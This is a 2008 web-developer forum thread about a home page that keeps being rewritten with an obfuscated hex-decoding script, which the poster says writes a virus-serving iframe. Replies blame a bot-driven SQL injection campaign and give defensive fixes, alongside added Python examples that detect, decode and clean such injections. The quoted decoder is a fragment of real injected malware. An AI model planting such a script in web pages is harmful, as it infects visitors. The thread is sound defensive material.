Bytes | Software Development & Data Engineering Community

new type of injection? rewrite default document?

This is weird, I'm pretty familiar with SQL Injection - but we're getting
these weird injections that are writing into the default document or home page.
What it's doing is putting script code at the top or bottom of the home
page... it looks something like this:

<script>function xy1q4877d47d91a36(q4877d47d92209){ function q4877d47d929d5() {return 16;} return (parseInt(q4877d47d92209,q4877d47d929d5()));}
function q4877d47d93974(q4877d47d94144) { var q4877d47d95c9b=2; var q4877d47d94d7f='';q4877d47d96c3a=String.fromCharCode;
for(q4877d47d954cc=0;q4877d47d954cc<q4877d47d94144.length;q4877d47d954cc+=q4877d47d95c9b){
q4877d47d94d7f+=(q4877d47d96c3a(xy1q4877d47d91a36(q4877d47d94144.substr(q4877d47d954cc,q4877d47d95c9b))));}
return q4877d47d94d7f; }
</script>

What it's doing is decoding itself into an iframe that links out to popups
that will try and download a virus on your machine. I don't get the popup
on my machine because I think I have a newer version of IE. But some
people have complained that it is installing a virus on their machine.

Also, what is crazy is that when I replace the file with a good version, in
about 30 mins it is automatically overwritten with the infected version.
Also I've noticed it on some other websites that I haven't touched.

Has anyone encountered this before? Because I'm stumped as to the cause of
it. I don't see the issue on our dev server. It seems to be IIS on a
shared host.

Brian
Jul 11 '08 #1
2 1896
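An added example, not part of Brian's post, showing how a defender can spot and unwrap a block of this shape without executing it: the post's decoder takes a string of hex pairs, runs parseInt(pair, 16) on each, maps the numbers through String.fromCharCode and document.write()s the result. The sample page, the marker list and the placeholder markup it hides are all constructed here; the placeholder host stands in for whatever the real payload pointed at.

```python
import re

# Everything below is constructed for this example. The decoder in the post
# takes a string of hex pairs, runs parseInt(pair, 16) on each, maps the
# numbers through String.fromCharCode and document.write()s the result; the
# sample page reproduces that shape with a placeholder host.
PLACEHOLDER_MARKUP = '<iframe src="http://placeholder.invalid/" width=0 height=0></iframe>'


def to_hex_pairs(text):
    """Encode text the way the injected block stores its payload."""
    return "".join(f"{ord(ch):02X}" for ch in text)


SAMPLE_HTML = (
    "<html><body>Welcome to the site</body></html>"
    "<script>function f(x){return parseInt(x,16);}"
    "function g(s){var w=2;var o='';h=String.fromCharCode;"
    "for(i=0;i<s.length;i+=w){o+=(h(f(s.substr(i,w))));}return o;}"
    " var p='" + to_hex_pairs(PLACEHOLDER_MARKUP) + "';document.write(g(p));</script>"
)

# All three appear together in the decoder; ordinary page scripts rarely use all of them.
DECODER_MARKERS = ("parseInt(", "String.fromCharCode", "document.write(")
SCRIPT_BLOCK = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)
HEX_LITERAL = re.compile(r"'((?:[0-9A-Fa-f]{2}){16,})'")  # 16+ hex pairs in quotes


def find_decoder_blocks(html):
    """Return the body of every <script> block carrying all decoder markers."""
    return [b for b in SCRIPT_BLOCK.findall(html) if all(m in b for m in DECODER_MARKERS)]


def decode_hex_literals(block):
    """Unwrap each long hex literal exactly as the decoder would, without running it."""
    return ["".join(chr(int(lit[i:i + 2], 16)) for i in range(0, len(lit), 2))
            for lit in HEX_LITERAL.findall(block)]


def reveal_injected_markup(html):
    """Markup the page would have written at load time: the iframe the post mentions."""
    return [m for b in find_decoder_blocks(html) for m in decode_hex_literals(b)]


if __name__ == "__main__":
    for markup in reveal_injected_markup(SAMPLE_HTML):
        print("injected block writes:", markup)
```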
It would seem you have a virus on your machine that is adding the code.

This is just a thought, I don't know if it will work, but try auditing access
to the file. Maybe then you can at least see what user the virus is running
under. Look in your task manager for the processes running.

Jul 13 '08 #2
Brian Bozarth wrote:
This is weird, I'm pretty familiar with SQL Injection - but we're
getting these weird injections that are writing into the default document or
home page. What it's doing is putting script code at the top or bottom of
the home page... it looks something like this:

Browse through the several threads about SQL injection that have been posted
in the last couple of weeks. You should find posts that mention these links:

http://www.aspmessageboard.com/forum...997&P=1#894984
http://isc.sans.org/diary.html?n&storyid=4294
http://blogs.technet.com/neilcar/arc...rt-2-meat.aspx

In a nutshell, you've been attacked by a bot that uses Google to find sites
that might be vulnerable to SQL injection, based on the use of querystrings
in the URLs. It then runs through a scripted routine to find the
vulnerabilities in the sites, and if they exist, uses those vulnerabilities
to insert those script tags you are seeing into every table in your
database. Since your code is likely to be writing data retrieved from the
database to Response without validating or encoding it, it's really your
code that is inserting the script tags into your pages.

So the first thing you should do is check the data in your database. If
corrupt, take it offline and restore a backup, or run a stored procedure
which was posted by Old Pedant to attempt to cleanse it. Then, go through
your server-side code with a fine-tooth comb and

1. Make your code impervious to sql injection by eliminating all use of
dynamic sql, using parameters instead.
See here for a better, more secure way to execute your queries by using
parameter markers:
http://groups-beta.google.com/group/...e36562fee7804e

Personally, I prefer using stored procedures, or saved parameter queries as
they are known in Access:

Access:
http://www.google.com/groups?hl=en&l...TNGP12.phx.gbl
http://groups.google.com/groups?hl=e...tngp13.phx.gbl

SQL Server:
http://groups.google.com/group/micro...9dc1701?hl=en&

2. Use Server.HTMLEncode when writing data to Response

--
Microsoft MVP - ASP/ASP.NET
Please reply to the newsgroup. This email account is my spam trap so I
don't check it very often. If you must reply off-line, then remove the
"NO SPAM"
Jul 13 '08 #3
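An added example (not from the reply's author or any of the linked posts) that walks the reply's checklist on a constructed SQLite stand-in for the database: find every text column carrying the injected tag, cleanse it, and read values back with a parameter marker and HTML encoding instead of dynamic SQL and raw Response output. The table names, rows and the placeholder script host are all made up here.

```python
import html
import re
import sqlite3

# Constructed stand-in for the SQL Server database the reply describes: the bot
# appended a <script src=...> tag to text columns in every table. Placeholder host.
INJECTED = '<script src="http://placeholder.invalid/x.js"></script>'
SCRIPT_TAG = re.compile(r"<script\b[^>]*>.*?</script>", re.I | re.S)

def sample_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT, blurb TEXT);
                          CREATE TABLE news(id INTEGER PRIMARY KEY, title TEXT);""")
    conn.executemany("INSERT INTO products VALUES (?,?,?)",
                     [(1, "Widget", "A fine widget" + INJECTED), (2, "Gadget", "Untouched")])
    conn.execute("INSERT INTO news VALUES (?,?)", (1, "Launch day" + INJECTED))
    return conn

def text_columns(conn):
    """Every (table, column) holding text: the same catalogue walk the injecting
    bot and a cleanup procedure both perform. Names come from the schema, never
    from a request, so quoting them into the SQL below is safe."""
    tables = [t for (t,) in conn.execute("SELECT name FROM sqlite_master WHERE type='table'")]
    return [(t, c[1]) for t in tables
            for c in conn.execute(f'PRAGMA table_info("{t}")') if c[2].upper() == "TEXT"]

def find_tainted(conn):
    """Rows per (table, column) that still carry a script tag: the 'check the
    data in your database' step."""
    hits = {}
    for t, c in text_columns(conn):
        n = conn.execute(f'SELECT COUNT(*) FROM "{t}" WHERE "{c}" LIKE ?', ("%<script%",)).fetchone()[0]
        if n:
            hits[(t, c)] = n
    return hits

def cleanse(conn):
    """Strip the tag from every tainted value (restoring a backup is the better
    option when one exists, as the reply says)."""
    for t, c in text_columns(conn):
        rows = conn.execute(f'SELECT rowid, "{c}" FROM "{t}" WHERE "{c}" LIKE ?', ("%<script%",)).fetchall()
        for rowid, val in rows:
            conn.execute(f'UPDATE "{t}" SET "{c}"=? WHERE rowid=?', (SCRIPT_TAG.sub("", val), rowid))
    conn.commit()

def product_blurb_html(conn, product_id):
    """Fix 1: a parameter marker instead of string-built SQL. Fix 2: encode on
    output (the Server.HTMLEncode step), so a stored tag renders as text."""
    row = conn.execute("SELECT blurb FROM products WHERE id=?", (product_id,)).fetchone()
    return html.escape(row[0]) if row else ""
```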
